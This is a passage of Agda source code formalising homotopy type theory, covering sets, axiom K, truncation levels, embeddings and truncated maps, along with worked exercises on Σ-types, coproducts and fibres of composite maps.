{l1 l2 : Level} {A : UU l1} {B : A → UU l2} (is-subtype-B : is-subtype B) → (p : Σ A B) → is-contr (Σ (Σ A B) (Eq-total-subtype is-subtype-B p)) is-contr-total-Eq-total-subtype is-subtype-B (pair x y) = is-contr-total-Eq-substructure ( is-contr-total-path x) ( is-subtype-B) x refl y is-equiv-Eq-total-subtype-eq : {l1 l2 : Level} {A : UU l1} {B : A → UU l2} (is-subtype-B : is-subtype B) → (p p' : Σ A B) → is-equiv (Eq-total-subtype-eq is-subtype-B p p') is-equiv-Eq-total-subtype-eq is-subtype-B p = fundamental-theorem-id p ( reflexive-Eq-total-subtype is-subtype-B p) ( is-contr-total-Eq-total-subtype is-subtype-B p) ( Eq-total-subtype-eq is-subtype-B p) eq-subtype : {l1 l2 : Level} {A : UU l1} {B : A → UU l2} (is-subtype-B : is-subtype B) → {p p' : Σ A B} → Eq-total-subtype is-subtype-B p p' → Id p p' eq-subtype is-subtype-B {p} {p'} = inv-is-equiv (is-equiv-Eq-total-subtype-eq is-subtype-B p p') -- Section 8.2 Sets is-set : {i : Level} → UU i → UU i is-set A = (x y : A) → is-prop (Id x y) UU-Set : (i : Level) → UU (lsuc i) UU-Set i = Σ (UU i) is-set type-Set : {l : Level} → UU-Set l → UU l type-Set X = pr1 X is-set-type-Set : {l : Level} (X : UU-Set l) → is-set (type-Set X) is-set-type-Set X = pr2 X axiom-K : {i : Level} → UU i → UU i axiom-K A = (x : A) (p : Id x x) → Id refl p abstract is-set-axiom-K : {i : Level} (A : UU i) → axiom-K A → is-set A is-set-axiom-K A H x y = is-prop-is-prop' (ind-Id x (λ z p → (q : Id x z) → Id p q) (H x) y) abstract axiom-K-is-set : {i : Level} (A : UU i) → is-set A → axiom-K A axiom-K-is-set A H x p = ( inv (contraction (is-contr-is-prop-inh (H x x) refl) refl)) ∙ ( contraction (is-contr-is-prop-inh (H x x) refl) p) abstract is-equiv-prop-in-id : {i j : Level} {A : UU i} (R : A → A → UU j) (p : (x y : A) → is-prop (R x y)) (ρ : (x : A) → R x x) (i : (x y : A) → R x y → Id x y) → (x y : A) → is-equiv (i x y) is-equiv-prop-in-id R p ρ i x = fundamental-theorem-id-retr x (i x) (λ y → pair (ind-Id x (λ z p → R x z) (ρ x) y) ((λ r → is-prop'-is-prop (p x y) _ r))) abstract is-prop-is-equiv : {i j : Level} {A : UU i} (B : UU j) (f : A → B) (E : is-equiv f) → is-prop B → is-prop A is-prop-is-equiv B f E H x y = is-contr-is-equiv _ (ap f {x} {y}) (is-emb-is-equiv f E x y) (H (f x) (f y)) abstract is-prop-is-equiv' : {i j : Level} (A : UU i) {B : UU j} (f : A → B) (E : is-equiv f) → is-prop A → is-prop B is-prop-is-equiv' A f E H = is-prop-is-equiv _ (inv-is-equiv E) (is-equiv-inv-is-equiv E) H abstract is-set-prop-in-id : {i j : Level} {A : UU i} (R : A → A → UU j) (p : (x y : A) → is-prop (R x y)) (ρ : (x : A) → R x x) (i : (x y : A) → R x y → Id x y) → is-set A is-set-prop-in-id R p ρ i x y = is-prop-is-equiv' ( R x y) ( i x y) ( is-equiv-prop-in-id R p ρ i x y) (p x y) abstract is-prop-Eq-ℕ : (n m : ℕ) → is-prop (Eq-ℕ n m) is-prop-Eq-ℕ zero-ℕ zero-ℕ = is-prop-unit is-prop-Eq-ℕ zero-ℕ (succ-ℕ m) = is-prop-empty is-prop-Eq-ℕ (succ-ℕ n) zero-ℕ = is-prop-empty is-prop-Eq-ℕ (succ-ℕ n) (succ-ℕ m) = is-prop-Eq-ℕ n m abstract eq-Eq-ℕ : (n m : ℕ) → Eq-ℕ n m → Id n m eq-Eq-ℕ = least-reflexive-Eq-ℕ Id (λ n → refl) abstract is-set-ℕ : is-set ℕ is-set-ℕ = is-set-prop-in-id Eq-ℕ is-prop-Eq-ℕ refl-Eq-ℕ eq-Eq-ℕ set-ℕ : UU-Set lzero set-ℕ = pair ℕ is-set-ℕ -- Section 8.3 General truncation levels data 𝕋 : UU lzero where neg-two-𝕋 : 𝕋 succ-𝕋 : 𝕋 → 𝕋 neg-one-𝕋 : 𝕋 neg-one-𝕋 = succ-𝕋 (neg-two-𝕋) zero-𝕋 : 𝕋 zero-𝕋 = succ-𝕋 (neg-one-𝕋) one-𝕋 : 𝕋 one-𝕋 = succ-𝕋 (zero-𝕋) ℕ-in-𝕋 : ℕ → 𝕋 ℕ-in-𝕋 zero-ℕ = zero-𝕋 ℕ-in-𝕋 (succ-ℕ n) = succ-𝕋 (ℕ-in-𝕋 n) -- Probably it is better to define this where we first need it. add-𝕋 : 𝕋 → 𝕋 → 𝕋 add-𝕋 neg-two-𝕋 neg-two-𝕋 = neg-two-𝕋 add-𝕋 neg-two-𝕋 (succ-𝕋 neg-two-𝕋) = neg-two-𝕋 add-𝕋 neg-two-𝕋 (succ-𝕋 (succ-𝕋 y)) = y add-𝕋 (succ-𝕋 neg-two-𝕋) neg-two-𝕋 = neg-two-𝕋 add-𝕋 (succ-𝕋 neg-two-𝕋) (succ-𝕋 y) = y add-𝕋 (succ-𝕋 (succ-𝕋 neg-two-𝕋)) y = y add-𝕋 (succ-𝕋 (succ-𝕋 (succ-𝕋 x))) y = succ-𝕋 (add-𝕋 (succ-𝕋 (succ-𝕋 x)) y) is-trunc : {i : Level} (k : 𝕋) → UU i → UU i is-trunc neg-two-𝕋 A = is-contr A is-trunc (succ-𝕋 k) A = (x y : A) → is-trunc k (Id x y) 1-type : (l : Level) → UU (lsuc l) 1-type l = Σ (UU l) (is-trunc one-𝕋) _Truncated-Type_ : 𝕋 → (l : Level) → UU (lsuc l) k Truncated-Type l = Σ (UU l) (is-trunc k) abstract is-trunc-succ-is-trunc : {i : Level} (k : 𝕋) (A : UU i) → is-trunc k A → is-trunc (succ-𝕋 k) A is-trunc-succ-is-trunc neg-two-𝕋 A H = is-prop-is-contr H is-trunc-succ-is-trunc (succ-𝕋 k) A H x y = is-trunc-succ-is-trunc k (Id x y) (H x y) truncated-type-succ-𝕋 : (l : Level) (k : 𝕋) → k Truncated-Type l → (succ-𝕋 k) Truncated-Type l truncated-type-succ-𝕋 l k (pair A is-trunc-A) = pair A (is-trunc-succ-is-trunc k A is-trunc-A) abstract is-trunc-is-equiv : {i j : Level} (k : 𝕋) {A : UU i} (B : UU j) (f : A → B) → is-equiv f → is-trunc k B → is-trunc k A is-trunc-is-equiv neg-two-𝕋 B f is-equiv-f H = is-contr-is-equiv B f is-equiv-f H is-trunc-is-equiv (succ-𝕋 k) B f is-equiv-f H x y = is-trunc-is-equiv k (Id (f x) (f y)) (ap f {x} {y}) (is-emb-is-equiv f is-equiv-f x y) (H (f x) (f y)) abstract is-set-is-equiv : {i j : Level} {A : UU i} (B : UU j) (f : A → B) → is-equiv f → is-set B → is-set A is-set-is-equiv = is-trunc-is-equiv zero-𝕋 abstract is-trunc-equiv : {i j : Level} (k : 𝕋) {A : UU i} (B : UU j) (e : A ≃ B) → is-trunc k B → is-trunc k A is-trunc-equiv k B (pair f is-equiv-f) = is-trunc-is-equiv k B f is-equiv-f abstract is-set-equiv : {i j : Level} {A : UU i} (B : UU j) (e : A ≃ B) → is-set B → is-set A is-set-equiv = is-trunc-equiv zero-𝕋 abstract is-trunc-is-equiv' : {i j : Level} (k : 𝕋) (A : UU i) {B : UU j} (f : A → B) → is-equiv f → is-trunc k A → is-trunc k B is-trunc-is-equiv' k A f is-equiv-f is-trunc-A = is-trunc-is-equiv k A ( inv-is-equiv is-equiv-f) ( is-equiv-inv-is-equiv is-equiv-f) ( is-trunc-A) abstract is-set-is-equiv' : {i j : Level} (A : UU i) {B : UU j} (f : A → B) → is-equiv f → is-set A → is-set B is-set-is-equiv' = is-trunc-is-equiv' zero-𝕋 abstract is-trunc-equiv' : {i j : Level} (k : 𝕋) (A : UU i) {B : UU j} (e : A ≃ B) → is-trunc k A → is-trunc k B is-trunc-equiv' k A (pair f is-equiv-f) = is-trunc-is-equiv' k A f is-equiv-f abstract is-set-equiv' : {i j : Level} (A : UU i) {B : UU j} (e : A ≃ B) → is-set A → is-set B is-set-equiv' = is-trunc-equiv' zero-𝕋 abstract is-trunc-succ-is-emb : {i j : Level} (k : 𝕋) {A : UU i} {B : UU j} (f : A → B) → is-emb f → is-trunc (succ-𝕋 k) B → is-trunc (succ-𝕋 k) A is-trunc-succ-is-emb k f Ef H x y = is-trunc-is-equiv k (Id (f x) (f y)) (ap f {x} {y}) (Ef x y) (H (f x) (f y)) is-trunc-map : {i j : Level} (k : 𝕋) {A : UU i} {B : UU j} → (A → B) → UU (i ⊔ j) is-trunc-map k f = (y : _) → is-trunc k (fib f y) trunc-map : {i j : Level} (k : 𝕋) (A : UU i) (B : UU j) → UU (i ⊔ j) trunc-map k A B = Σ (A → B) (is-trunc-map k) abstract is-trunc-pr1-is-trunc-fam : {i j : Level} (k : 𝕋) {A : UU i} (B : A → UU j) → ((x : A) → is-trunc k (B x)) → is-trunc-map k (pr1 {i} {j} {A} {B}) is-trunc-pr1-is-trunc-fam k B H x = is-trunc-is-equiv k ( B x) ( fib-fam-fib-pr1 B x) ( is-equiv-fib-fam-fib-pr1 B x) ( H x) trunc-pr1 : {i j : Level} (k : 𝕋) {A : UU i} (B : A → k Truncated-Type j) → trunc-map k (Σ A (λ x → pr1 (B x))) A trunc-pr1 k B = pair pr1 (is-trunc-pr1-is-trunc-fam k (λ x → pr1 (B x)) (λ x → pr2 (B x))) abstract is-trunc-fam-is-trunc-pr1 : {i j : Level} (k : 𝕋) {A : UU i} (B : A → UU j) → is-trunc-map k (pr1 {i} {j} {A} {B}) → ((x : A) → is-trunc k (B x)) is-trunc-fam-is-trunc-pr1 k B is-trunc-pr1 x = is-trunc-is-equiv k ( fib pr1 x) ( fib-pr1-fib-fam B x) ( is-equiv-fib-pr1-fib-fam B x) ( is-trunc-pr1 x) abstract is-trunc-map-is-trunc-ap : {i j : Level} (k : 𝕋) {A : UU i} {B : UU j} (f : A → B) → ((x y : A) → is-trunc-map k (ap f {x = x} {y = y})) → is-trunc-map (succ-𝕋 k) f is-trunc-map-is-trunc-ap k f is-trunc-ap-f b (pair x p) (pair x' p') = is-trunc-is-equiv k ( fib (ap f) (p ∙ (inv p'))) ( fib-ap-eq-fib f (pair x p) (pair x' p')) ( is-equiv-fib-ap-eq-fib f (pair x p) (pair x' p')) ( is-trunc-ap-f x x' (p ∙ (inv p'))) abstract is-trunc-ap-is-trunc-map : {i j : Level} (k : 𝕋) {A : UU i} {B : UU j} (f : A → B) → is-trunc-map (succ-𝕋 k) f → (x y : A) → is-trunc-map k (ap f {x = x} {y = y}) is-trunc-ap-is-trunc-map k f is-trunc-map-f x y p = is-trunc-is-equiv' k ( Id (pair x p) (pair y refl)) ( eq-fib-fib-ap f x y p) ( is-equiv-eq-fib-fib-ap f x y p) ( is-trunc-map-f (f y) (pair x p) (pair y refl)) is-prop-map : {i j : Level} {A : UU i} {B : UU j} (f : A → B) → UU (i ⊔ j) is-prop-map f = (b : _) → is-trunc neg-one-𝕋 (fib f b) abstract is-emb-is-prop-map : {i j : Level} {A : UU i} {B : UU j} (f : A → B) → is-prop-map f → is-emb f is-emb-is-prop-map f is-prop-map-f x y = is-equiv-is-contr-map ( is-trunc-ap-is-trunc-map neg-two-𝕋 f is-prop-map-f x y) abstract is-prop-map-is-emb : {i j : Level} {A : UU i} {B : UU j} (f : A → B) → is-emb f → is-prop-map f is-prop-map-is-emb f is-emb-f = is-trunc-map-is-trunc-ap neg-two-𝕋 f ( λ x y → is-contr-map-is-equiv (is-emb-f x y)) abstract is-emb-pr1-is-subtype : {i j : Level} {A : UU i} {B : A → UU j} → is-subtype B → is-emb (pr1 {B = B}) is-emb-pr1-is-subtype {B = B} is-subtype-B = is-emb-is-prop-map pr1 ( λ x → is-trunc-is-equiv neg-one-𝕋 ( B x) ( fib-fam-fib-pr1 _ x) ( is-equiv-fib-fam-fib-pr1 _ x) ( is-subtype-B x)) equiv-ap-pr1-is-subtype : {i j : Level} {A : UU i} {B : A → UU j} → is-subtype B → {s t : Σ A B} → Id s t ≃ Id (pr1 s) (pr1 t) equiv-ap-pr1-is-subtype is-subtype-B {s} {t} = pair ( ap pr1) ( is-emb-pr1-is-subtype is-subtype-B s t) abstract is-subtype-is-emb-pr1 : {i j : Level} {A : UU i} {B : A → UU j} → is-emb (pr1 {B = B}) → is-subtype B is-subtype-is-emb-pr1 is-emb-pr1-B x = is-trunc-is-equiv neg-one-𝕋 ( fib pr1 x) ( fib-pr1-fib-fam _ x) ( is-equiv-fib-pr1-fib-fam _ x) ( is-prop-map-is-emb pr1 is-emb-pr1-B x) is-fiberwise-trunc : {l1 l2 l3 : Level} (k : 𝕋) {A : UU l1} {B : A → UU l2} {C : A → UU l3} (f : (x : A) → B x → C x) → UU (l1 ⊔ (l2 ⊔ l3)) is-fiberwise-trunc k f = (x : _) → is-trunc-map k (f x) abstract is-trunc-tot-is-fiberwise-trunc : {l1 l2 l3 : Level} (k : 𝕋) {A : UU l1} {B : A → UU l2} {C : A → UU l3} (f : (x : A) → B x → C x) → is-fiberwise-trunc k f → is-trunc-map k (tot f) is-trunc-tot-is-fiberwise-trunc k f is-fiberwise-trunc-f (pair x z) = is-trunc-is-equiv k ( fib (f x) z) ( fib-ftr-fib-tot f (pair x z)) ( is-equiv-fib-ftr-fib-tot f (pair x z)) ( is-fiberwise-trunc-f x z) abstract is-fiberwise-trunc-is-trunc-tot : {l1 l2 l3 : Level} (k : 𝕋) {A : UU l1} {B : A → UU l2} {C : A → UU l3} (f : (x : A) → B x → C x) → is-trunc-map k (tot f) → is-fiberwise-trunc k f is-fiberwise-trunc-is-trunc-tot k f is-trunc-tot-f x z = is-trunc-is-equiv k ( fib (tot f) (pair x z)) ( fib-tot-fib-ftr f (pair x z)) ( is-equiv-fib-tot-fib-ftr f (pair x z)) ( is-trunc-tot-f (pair x z)) -- Exercises -- Exercise 8.1 -- Exercise 8.1 diagonal : {l : Level} (A : UU l) → A → A × A diagonal A x = pair x x abstract is-prop-is-equiv-diagonal : {l : Level} (A : UU l) → is-equiv (diagonal A) → is-prop A is-prop-is-equiv-diagonal A is-equiv-d = is-prop-is-prop' ( λ x y → let α = issec-inv-is-equiv is-equiv-d (pair x y) in ( inv (ap pr1 α)) ∙ (ap pr2 α)) eq-fib-diagonal : {l : Level} (A : UU l) (t : A × A) → fib (diagonal A) t → Id (pr1 t) (pr2 t) eq-fib-diagonal A (pair x y) (pair z α) = (inv (ap pr1 α)) ∙ (ap pr2 α) fib-diagonal-eq : {l : Level} (A : UU l) (t : A × A) → Id (pr1 t) (pr2 t) → fib (diagonal A) t fib-diagonal-eq A (pair x y) β = pair x (eq-pair-triv (pair refl β)) issec-fib-diagonal-eq : {l : Level} (A : UU l) (t : A × A) → ((eq-fib-diagonal A t) ∘ (fib-diagonal-eq A t)) ~ id issec-fib-diagonal-eq A (pair x .x) refl = refl isretr-fib-diagonal-eq : {l : Level} (A : UU l) (t : A × A) → ((fib-diagonal-eq A t) ∘ (eq-fib-diagonal A t)) ~ id isretr-fib-diagonal-eq A .(pair z z) (pair z refl) = refl abstract is-equiv-eq-fib-diagonal : {l : Level} (A : UU l) (t : A × A) → is-equiv (eq-fib-diagonal A t) is-equiv-eq-fib-diagonal A t = is-equiv-has-inverse ( fib-diagonal-eq A t) ( issec-fib-diagonal-eq A t) ( isretr-fib-diagonal-eq A t) abstract is-trunc-is-trunc-diagonal : {l : Level} (k : 𝕋) (A : UU l) → is-trunc-map k (diagonal A) → is-trunc (succ-𝕋 k) A is-trunc-is-trunc-diagonal k A is-trunc-d x y = is-trunc-is-equiv' k ( fib (diagonal A) (pair x y)) ( eq-fib-diagonal A (pair x y)) ( is-equiv-eq-fib-diagonal A (pair x y)) ( is-trunc-d (pair x y)) abstract is-trunc-diagonal-is-trunc : {l : Level} (k : 𝕋) (A : UU l) → is-trunc (succ-𝕋 k) A → is-trunc-map k (diagonal A) is-trunc-diagonal-is-trunc k A is-trunc-A t = is-trunc-is-equiv k ( Id (pr1 t) (pr2 t)) ( eq-fib-diagonal A t) ( is-equiv-eq-fib-diagonal A t) ( is-trunc-A (pr1 t) (pr2 t)) -- Exercise 8.2 -- Exercise 8.2(a) abstract is-trunc-Σ : {l1 l2 : Level} (k : 𝕋) {A : UU l1} {B : A → UU l2} → is-trunc k A → ((x : A) → is-trunc k (B x)) → is-trunc k (Σ A B) is-trunc-Σ neg-two-𝕋 is-trunc-A is-trunc-B = is-contr-Σ is-trunc-A is-trunc-B is-trunc-Σ (succ-𝕋 k) {B = B} is-trunc-A is-trunc-B s t = is-trunc-is-equiv k ( Σ (Id (pr1 s) (pr1 t)) (λ p → Id (tr B p (pr2 s)) (pr2 t))) ( pair-eq) ( is-equiv-pair-eq s t) ( is-trunc-Σ k ( is-trunc-A (pr1 s) (pr1 t)) ( λ p → is-trunc-B (pr1 t) (tr B p (pr2 s)) (pr2 t))) abstract is-trunc-prod : {l1 l2 : Level} (k : 𝕋) {A : UU l1} {B : UU l2} → is-trunc k A → is-trunc k B → is-trunc k (A × B) is-trunc-prod k is-trunc-A is-trunc-B = is-trunc-Σ k is-trunc-A (λ x → is-trunc-B) abstract is-prop-Σ : {l1 l2 : Level} {A : UU l1} {B : A → UU l2} → is-prop A → is-subtype B → is-prop (Σ A B) is-prop-Σ = is-trunc-Σ neg-one-𝕋 Σ-Prop : {l1 l2 : Level} (P : UU-Prop l1) (Q : type-Prop P → UU-Prop l2) → UU-Prop (l1 ⊔ l2) Σ-Prop P Q = pair ( Σ (type-Prop P) (λ p → type-Prop (Q p))) ( is-prop-Σ ( is-prop-type-Prop P) ( λ p → is-prop-type-Prop (Q p))) abstract is-prop-prod : {l1 l2 : Level} {A : UU l1} {B : UU l2} → is-prop A → is-prop B → is-prop (A × B) is-prop-prod = is-trunc-prod neg-one-𝕋 prod-Prop : {l1 l2 : Level} → UU-Prop l1 → UU-Prop l2 → UU-Prop (l1 ⊔ l2) prod-Prop P Q = pair ( type-Prop P × type-Prop Q) ( is-prop-prod (is-prop-type-Prop P) (is-prop-type-Prop Q)) abstract is-set-Σ : {l1 l2 : Level} {A : UU l1} {B : A → UU l2} → is-set A → ((x : A) → is-set (B x)) → is-set (Σ A B) is-set-Σ = is-trunc-Σ zero-𝕋 set-Σ : {l1 l2 : Level} (A : UU-Set l1) (B : pr1 A → UU-Set l2) → UU-Set (l1 ⊔ l2) set-Σ (pair A is-set-A) B = pair ( Σ A (λ x → (pr1 (B x)))) ( is-set-Σ is-set-A (λ x → pr2 (B x))) abstract is-set-prod : {l1 l2 : Level} {A : UU l1} {B : UU l2} → is-set A → is-set B → is-set (A × B) is-set-prod = is-trunc-prod zero-𝕋 set-prod : {l1 l2 : Level} (A : UU-Set l1) (B : UU-Set l2) → UU-Set (l1 ⊔ l2) set-prod (pair A is-set-A) (pair B is-set-B) = pair (A × B) (is-set-prod is-set-A is-set-B) -- Exercise 8.2 (b) abstract is-trunc-Id : {l : Level} (k : 𝕋) {A : UU l} → is-trunc k A → (x y : A) → is-trunc k (Id x y) is-trunc-Id neg-two-𝕋 is-trunc-A = is-prop-is-contr is-trunc-A is-trunc-Id (succ-𝕋 k) is-trunc-A x y = is-trunc-succ-is-trunc k (Id x y) (is-trunc-A x y) -- Exercise 8.2 (c) abstract is-trunc-map-is-trunc-domain-codomain : {l1 l2 : Level} (k : 𝕋) {A : UU l1} {B : UU l2} {f : A → B} → is-trunc k A → is-trunc k B → is-trunc-map k f is-trunc-map-is-trunc-domain-codomain k {f = f} is-trunc-A is-trunc-B b = is-trunc-Σ k is-trunc-A (λ x → is-trunc-Id k is-trunc-B (f x) b) -- Exercise 8.2 (d) abstract is-trunc-fam-is-trunc-Σ : {l1 l2 : Level} (k : 𝕋) {A : UU l1} {B : A → UU l2} → is-trunc k A → is-trunc k (Σ A B) → (x : A) → is-trunc k (B x) is-trunc-fam-is-trunc-Σ k {B = B} is-trunc-A is-trunc-ΣAB x = is-trunc-is-equiv' k ( fib pr1 x) ( fib-fam-fib-pr1 B x) ( is-equiv-fib-fam-fib-pr1 B x) ( is-trunc-map-is-trunc-domain-codomain k is-trunc-ΣAB is-trunc-A x) -- Exercise 8.3 abstract is-prop-Eq-𝟚 : (x y : bool) → is-prop (Eq-𝟚 x y) is-prop-Eq-𝟚 true true = is-prop-unit is-prop-Eq-𝟚 true false = is-prop-empty is-prop-Eq-𝟚 false true = is-prop-empty is-prop-Eq-𝟚 false false = is-prop-unit abstract eq-Eq-𝟚 : (x y : bool) → Eq-𝟚 x y → Id x y eq-Eq-𝟚 true true star = refl eq-Eq-𝟚 true false () eq-Eq-𝟚 false true () eq-Eq-𝟚 false false star = refl abstract is-set-bool : is-set bool is-set-bool = is-set-prop-in-id Eq-𝟚 is-prop-Eq-𝟚 reflexive-Eq-𝟚 eq-Eq-𝟚 set-bool : UU-Set lzero set-bool = pair bool is-set-bool -- Exercise 8.4 abstract is-trunc-succ-empty : (k : 𝕋) → is-trunc (succ-𝕋 k) empty is-trunc-succ-empty k = ind-empty abstract is-trunc-coprod : {l1 l2 : Level} (k : 𝕋) {A : UU l1} {B : UU l2} → is-trunc (succ-𝕋 (succ-𝕋 k)) A → is-trunc (succ-𝕋 (succ-𝕋 k)) B → is-trunc (succ-𝕋 (succ-𝕋 k)) (coprod A B) is-trunc-coprod k {A} {B} is-trunc-A is-trunc-B (inl x) (inl y) = is-trunc-is-equiv (succ-𝕋 k) ( Eq-coprod A B (inl x) (inl y)) ( Eq-coprod-eq A B (inl x) (inl y)) ( is-equiv-Eq-coprod-eq A B (inl x) (inl y)) ( is-trunc-is-equiv' (succ-𝕋 k) ( Id x y) ( map-raise _ (Id x y)) ( is-equiv-map-raise _ (Id x y)) ( is-trunc-A x y)) is-trunc-coprod k {A} {B} is-trunc-A is-trunc-B (inl x) (inr y) = is-trunc-is-equiv (succ-𝕋 k) ( Eq-coprod A B (inl x) (inr y)) ( Eq-coprod-eq A B (inl x) (inr y)) ( is-equiv-Eq-coprod-eq A B (inl x) (inr y)) ( is-trunc-is-equiv' (succ-𝕋 k) ( empty) ( map-raise _ empty) ( is-equiv-map-raise _ empty) ( is-trunc-succ-empty k)) is-trunc-coprod k {A} {B} is-trunc-A is-trunc-B (inr x) (inl y) = is-trunc-is-equiv (succ-𝕋 k) ( Eq-coprod A B (inr x) (inl y)) ( Eq-coprod-eq A B (inr x) (inl y)) ( is-equiv-Eq-coprod-eq A B (inr x) (inl y)) ( is-trunc-is-equiv' (succ-𝕋 k) ( empty) ( map-raise _ empty) ( is-equiv-map-raise _ empty) ( is-trunc-succ-empty k)) is-trunc-coprod k {A} {B} is-trunc-A is-trunc-B (inr x) (inr y) = is-trunc-is-equiv (succ-𝕋 k) ( Eq-coprod A B (inr x) (inr y)) ( Eq-coprod-eq A B (inr x) (inr y)) ( is-equiv-Eq-coprod-eq A B (inr x) (inr y)) ( is-trunc-is-equiv' (succ-𝕋 k) ( Id x y) ( map-raise _ (Id x y)) ( is-equiv-map-raise _ (Id x y)) ( is-trunc-B x y)) abstract is-set-coprod : {l1 l2 : Level} {A : UU l1} {B : UU l2} → is-set A → is-set B → is-set (coprod A B) is-set-coprod = is-trunc-coprod neg-two-𝕋 set-coprod : {l1 l2 : Level} (A : UU-Set l1) (B : UU-Set l2) → UU-Set (l1 ⊔ l2) set-coprod (pair A is-set-A) (pair B is-set-B) = pair (coprod A B) (is-set-coprod is-set-A is-set-B) abstract is-set-unit : is-set unit is-set-unit = is-trunc-succ-is-trunc neg-one-𝕋 unit is-prop-unit set-unit : UU-Set lzero set-unit = pair unit is-set-unit abstract is-set-ℤ : is-set ℤ is-set-ℤ = is-set-coprod is-set-ℕ (is-set-coprod is-set-unit is-set-ℕ) set-ℤ : UU-Set lzero set-ℤ = pair ℤ is-set-ℤ is-set-empty : is-set empty is-set-empty () abstract is-set-Fin : (n : ℕ) → is-set (Fin n) is-set-Fin zero-ℕ = is-set-empty is-set-Fin (succ-ℕ n) = is-set-coprod (is-set-Fin n) is-set-unit set-Fin : (n : ℕ) → UU-Set lzero set-Fin n = pair (Fin n) (is-set-Fin n) -- Exercise 8.7 abstract is-trunc-retract-of : {l1 l2 : Level} (k : 𝕋) {A : UU l1} {B : UU l2} → A retract-of B → is-trunc k B → is-trunc k A is-trunc-retract-of neg-two-𝕋 (pair i (pair r H)) is-trunc-B = is-contr-retract-of _ (pair i (pair r H)) is-trunc-B is-trunc-retract-of (succ-𝕋 k) (pair i retr-i) is-trunc-B x y = is-trunc-retract-of k ( pair (ap i) (retr-ap i retr-i x y)) ( is-trunc-B (i x) (i y)) -- Exercise 8.8 is-injective : {l1 l2 : Level} {A : UU l1} (is-set-A : is-set A) {B : UU l2} (is-set-B : is-set B) (f : A → B) → UU (l1 ⊔ l2) is-injective {A = A} is-set-A is-set-B f = (x y : A) → Id (f x) (f y) → Id x y is-injective-const-true : is-injective is-set-unit is-set-bool (const unit bool true) is-injective-const-true x y p = center (is-prop-unit x y) is-injective-const-false : is-injective is-set-unit is-set-bool (const unit bool false) is-injective-const-false x y p = center (is-prop-unit x y) abstract is-equiv-is-prop : {l1 l2 : Level} {A : UU l1} {B : UU l2} → is-prop A → is-prop B → {f : A → B} → (B → A) → is-equiv f is-equiv-is-prop is-prop-A is-prop-B {f} g = is-equiv-has-inverse ( g) ( λ y → center (is-prop-B (f (g y)) y)) ( λ x → center (is-prop-A (g (f x)) x)) equiv-prop : { l1 l2 : Level} {A : UU l1} {B : UU l2} → is-prop A → is-prop B → ( A → B) → (B → A) → A ≃ B equiv-prop is-prop-A is-prop-B f g = pair f (is-equiv-is-prop is-prop-A is-prop-B g) equiv-total-subtype : { l1 l2 l3 : Level} {A : UU l1} {P : A → UU l2} {Q : A → UU l3} → ( is-subtype-P : is-subtype P) (is-subtype-Q : is-subtype Q) → ( f : (x : A) → P x → Q x) → ( g : (x : A) → Q x → P x) → ( Σ A P) ≃ (Σ A Q) equiv-total-subtype is-subtype-P is-subtype-Q f g = pair ( tot f) ( is-equiv-tot-is-fiberwise-equiv {f = f} ( λ x → is-equiv-is-prop (is-subtype-P x) (is-subtype-Q x) (g x))) abstract is-emb-is-injective : {l1 l2 : Level} {A : UU l1} (is-set-A : is-set A) {B : UU l2} (is-set-B : is-set B) (f : A → B) → is-injective is-set-A is-set-B f → is-emb f is-emb-is-injective is-set-A is-set-B f is-injective-f x y = is-equiv-is-prop ( is-set-A x y) ( is-set-B (f x) (f y)) ( is-injective-f x y) abstract is-injective-is-emb : {l1 l2 : Level} {A : UU l1} {is-set-A : is-set A} {B : UU l2} {is-set-B : is-set B} {f : A → B} → is-emb f → is-injective is-set-A is-set-B f is-injective-is-emb is-emb-f x y = inv-is-equiv (is-emb-f x y) -- Exercise 8.9 abstract is-trunc-const-is-trunc : {l : Level} (k : 𝕋) {A : UU l} → is-trunc (succ-𝕋 k) A → (x : A) → is-trunc-map k (const unit A x) is-trunc-const-is-trunc k is-trunc-A x y = is-trunc-is-equiv' k ( Id x y) ( left-unit-law-Σ-map (λ t → Id x y) is-contr-unit) ( is-equiv-left-unit-law-Σ-map (λ t → Id x y) is-contr-unit) ( is-trunc-A x y) abstract is-trunc-is-trunc-const : {l : Level} (k : 𝕋) {A : UU l} → ((x : A) → is-trunc-map k (const unit A x)) → is-trunc (succ-𝕋 k) A is-trunc-is-trunc-const k is-trunc-const x y = is-trunc-is-equiv k ( Σ unit (λ t → Id x y)) ( left-unit-law-Σ-map (λ t → Id x y) is-contr-unit) ( is-equiv-left-unit-law-Σ-map (λ t → Id x y) is-contr-unit) ( is-trunc-const x y) -- Exercise 8.10 map-fib-comp : {l1 l2 l3 : Level} {A : UU l1} {B : UU l2} {X : UU l3} (g : B → X) (h : A → B) → (x : X) → fib (g ∘ h) x → Σ (fib g x) (λ t → fib h (pr1 t)) map-fib-comp g h x (pair a p) = pair ( pair (h a) p) ( pair a refl) inv-map-fib-comp : {l1 l2 l3 : Level} {A : UU l1} {B : UU l2} {X : UU l3} (g : B → X) (h : A → B) → (x : X) → Σ (fib g x) (λ t → fib h (pr1 t)) → fib (g ∘ h) x inv-map-fib-comp g h c t = pair (pr1 (pr2 t)) ((ap g (pr2 (pr2 t))) ∙ (pr2 (pr1 t))) issec-inv-map-fib-comp : {l1 l2 l3 : Level} {A : UU l1} {B : UU l2} {X : UU l3} (g : B → X) (h : A → B) → (x : X) → ((map-fib-comp g h x) ∘ (inv-map-fib-comp g h x)) ~ id issec-inv-map-fib-comp g h x (pair (pair .(h a) refl) (pair a refl)) = refl isretr-inv-map-fib-comp : {l1 l2 l3 : Level} {A : UU l1} {B : UU l2} {X : UU l3} (g : B → X) (h : A → B) (x : X) → ((inv-map-fib-comp g h x) ∘ (map-fib-comp g h x)) ~ id isretr-inv-map-fib-comp g h .(g (h a)) (pair a refl) = refl abstract is-equiv-map-fib-comp : {l1 l2 l3 : Level} {A : UU l1} {B : UU l2} {X : UU l3} (g : B → X) (h : A → B) (x : X) → is-equiv (map-fib-comp g h x) is-equiv-map-fib-comp g h x = is-equiv-has-inverse ( inv-map-fib-comp g h x) ( issec-inv-map-fib-comp g h x) ( isretr-inv-map-fib-comp g h x) abstract is-equiv-inv-map-fib-comp : {l1 l2 l3 : Level} {A : UU l1} {B : UU l2} {X : UU l3} (g : B → X) (h : A → B) (x : X) → is-equiv (inv-map-fib-comp g h x) is-equiv-inv-map-fib-comp g h x = is-equiv-has-inverse ( map-fib-comp g h x) ( isretr-inv-map-fib-comp g h x) ( issec-inv-map-fib-comp g h x) abstract is-trunc-map-htpy : {l1 l2 : Level} (k : 𝕋) {A : UU l1} {B : UU l2} (f g : A → B) → f ~ g → is-trunc-map k g → is-trunc-map k f is-trunc-map-htpy k {A} f g H is-trunc-g b 